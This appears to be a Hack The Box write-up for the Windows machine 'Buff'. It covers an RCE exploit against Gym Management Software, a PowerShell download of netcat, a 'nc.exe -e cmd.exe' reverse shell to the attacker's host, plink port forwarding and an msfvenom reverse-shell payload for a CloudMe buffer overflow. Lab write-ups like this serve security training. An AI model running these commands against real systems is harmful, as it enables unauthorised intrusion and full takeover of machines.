Buff is a Windows machine rated as easy from Hack The Box, it consists on exploiting Gym Manager Software 1.0 to obtain initial access, and then, by doing port forwarding we can exploit a binary running on the machine via buffer overflow.
Enumeration
Running nmap :
1
2
3
4
5
6
7
8
9
nmap -sC -sV 10.10.10.198
Nmap scan report for 10.10.10.198
Host is up (0.079s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut
Browsing to port 8080 we find the following page :
Going to contact we see it has been made using Gym Management Software 1.0
Exploitation
The following RCE exploit was found for Gym Management Software 1.0 :
https://www.exploit-db.com/exploits/48506
Running the exploit we get a limited web shell:
1
2
3
4
5
6
7
8
9
10
python exploit.py 'http://10.10.10.198:8080/'
/\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
\/
[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload> whoami
�PNG
buff\shaun
To obtain a complete shell, we can upload netcat to the machine.
First we setup a python server :
1
python -m SimpleHTTPServer 80
Now we upload netcat to the victim machine :
1
C:\xampp\htdocs\gym\upload> powershell -c Invoke-WebRequest http://10.10.14.50/nc.exe -OutFile nc.exe
Using netcat to setup a bind shell :
1
C:\xampp\htdocs\gym\upload> nc.exe -e cmd.exe 10.10.14.50 443
And we obtain a complete shell as user Shaun :
1
2
3
4
5
6
7
8
9
nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.50] from (UNKNOWN) [10.10.10.198] 49698
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\xampp\htdocs\gym\upload>whoami
whoami
buff\shaun
Privilege Escalation
Enumerating the machine I found Cloudme 1.11.2 inside Downloads :
1
2
3
4
5
Directory of C:\Users\shaun\Downloads
14/07/2020 13:27 <DIR> .
14/07/2020 13:27 <DIR> ..
16/06/2020 16:26 17,830,824 CloudMe_1112.exe
Then, running tasklist we see that Cloudme.exe is running :
1
2
C:\Users\shaun\Downloads>tasklist
CloudMe.exe 2820 0 36,396 K
Searching that binary I found a Buffer Overflow exploit for it
https://www.exploit-db.com/exploits/48389
As the windows machine didnt’t have python we need to use port forwarding to run the exploit locally, reading the exploit code we see the service is running in port 8888.
For this purpose we will be using plink:
1
2
C:\Users\shaun\Desktop>powershell -c Invoke-WebRequest http://10.10.14.50/plink.exe -OutFile plink.exe
C:\Users\shaun\Desktop>plink.exe -l root -pw hola123 -R 8888:127.0.0.1:8888 10.10.14.50
Now we update the shellcode for the exploit :
1
msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.50 LPORT=4444 -b '\x00\x0A\x0D' -f python EXITFUNC=thread -v payload
Running the exploit gives us a reverse shell as administrator :
1
python cloudme.py
1
2
3
4
5
6
7
8
nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.50] from (UNKNOWN) [10.10.10.198] 49719
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
buff\administrator